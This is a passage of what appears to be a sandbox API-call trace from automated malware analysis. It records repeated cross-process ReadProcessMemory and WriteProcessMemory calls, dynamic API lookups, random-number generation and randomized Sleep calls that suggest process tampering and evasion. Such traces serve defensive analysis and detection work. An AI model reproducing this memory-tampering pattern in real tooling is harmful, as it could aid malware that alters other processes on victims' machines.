(hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0261.260] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4740, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0261.899] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0261.899] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4750, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0262.157] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0262.157] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4750, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0262.848] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0262.849] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4760, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0263.142] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0263.142] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4760, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0263.855] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0263.855] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4770, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0264.095] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0264.095] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4770, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0264.640] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0264.641] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4780, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0264.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0264.946] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4780, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0265.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0265.965] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4790, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0266.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0266.460] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4790, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0267.741] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0267.742] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47a0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0268.156] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0268.157] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47a0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0269.000] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0269.001] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47b0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0269.345] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0269.345] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47b0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0270.201] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0270.201] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47c0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0270.507] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0270.507] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47c0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0271.192] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0271.192] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47d0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0271.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0271.481] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47d0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0272.144] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0272.144] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47e0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0272.503] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0272.503] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47e0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0273.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0273.438] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47f0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0273.817] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0273.817] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a47f0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0274.544] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0274.544] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4800, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0274.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0274.912] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4800, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0275.552] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0275.554] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4810, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0275.841] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0275.842] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4810, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0276.496] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0276.497] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4820, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0276.893] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0276.893] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4820, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0277.467] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0277.467] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4830, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0277.731] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0277.731] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4830, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0278.408] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0278.409] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4840, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0278.740] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0278.740] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4840, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0279.501] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0279.501] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4850, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0280.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0280.036] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4850, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0280.788] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0280.788] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4860, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0281.145] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0281.146] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4860, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0281.977] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0281.977] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4870, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0282.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0282.315] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4870, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0283.157] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0283.157] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4880, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0283.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0283.450] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4880, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0286.642] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0286.642] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4890, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0286.883] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0286.883] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4890, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0287.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0287.424] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48a0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0287.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0287.798] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48a0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0288.493] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0288.493] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48b0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0288.838] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0288.838] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48b0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0289.476] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0289.593] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48c0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0289.862] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0289.862] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48c0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0290.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0290.438] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48d0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0290.758] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0290.758] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48d0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0291.641] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0291.641] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48e0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0292.009] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0292.009] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48e0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0293.083] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0293.083] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48f0, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0293.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0293.447] WriteProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a48f0, lpBuffer=0x14f2c0*, nSize=0x8, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesWritten=0x0) returned 1 [0294.369] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadProcessMemory") returned 0x7ffc5ecf3680 [0294.369] ReadProcessMemory (in: hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4900, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x14f2c0*, lpNumberOfBytesRead=0x0) returned 1 [0294.830] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="WriteProcessMemory") returned 0x7ffc5ecfa3f0 [0294.831] WriteProcessMemory (hProcess=0x1c0, lpBaseAddress=0x7ff60e6a4900, lpBuffer=0x14f2c0, nSize=0x8, lpNumberOfBytesWritten=0x0) Thread: id = 11 os_tid = 0xc58 Thread: id = 39 os_tid = 0x112c [0112.810] GetLastError () returned 0x57 [0112.810] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0112.882] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x80) returned 0x2c83d00 [0112.882] SetLastError (dwErrCode=0x57) [0112.882] GetLastError () returned 0x57 [0112.882] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x2c83d90 [0112.883] SetLastError (dwErrCode=0x57) [0112.888] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0112.888] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0112.888] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0112.888] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0112.888] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0112.889] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 Thread: id = 40 os_tid = 0x1130 [0113.141] GetLastError () returned 0x57 [0113.141] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x80) returned 0x2c85d60 [0113.141] SetLastError (dwErrCode=0x57) [0113.141] GetLastError () returned 0x57 [0113.141] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x2c85df0 [0113.141] SetLastError (dwErrCode=0x57) [0113.142] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0113.142] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0113.142] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0113.142] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0113.142] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0113.143] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 Thread: id = 41 os_tid = 0x1144 [0113.406] GetLastError () returned 0x57 [0113.406] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x80) returned 0x2c86910 [0113.406] SetLastError (dwErrCode=0x57) [0113.406] GetLastError () returned 0x57 [0113.406] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x2c8b210 [0113.406] SetLastError (dwErrCode=0x57) [0113.407] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0113.407] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0113.407] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0113.407] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0113.407] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0113.407] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 Thread: id = 142 os_tid = 0x2ec Thread: id = 143 os_tid = 0x698 [0143.753] GetLastError () returned 0x57 [0143.754] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x80) returned 0x2c86ac0 [0143.754] SetLastError (dwErrCode=0x57) [0143.754] GetLastError () returned 0x57 [0143.754] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x2ca9070 [0143.754] SetLastError (dwErrCode=0x57) [0143.754] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0143.755] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0143.755] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0143.755] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0143.755] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0143.756] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 Thread: id = 144 os_tid = 0x37c [0143.768] GetLastError () returned 0x57 [0143.768] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x80) returned 0x2c86b50 [0143.768] SetLastError (dwErrCode=0x57) [0143.768] GetLastError () returned 0x57 [0143.768] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x2cac880 [0143.768] SetLastError (dwErrCode=0x57) [0143.769] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0143.769] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0143.769] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0143.769] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0143.770] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0143.770] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0143.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0143.770] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0143.770] Sleep (dwMilliseconds=0x15967) [0153.877] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0153.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0153.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0153.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0153.882] GetProcessHeap () returned 0x440000 [0153.882] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5390 [0153.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0153.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.883] BCryptGenRandom (in: 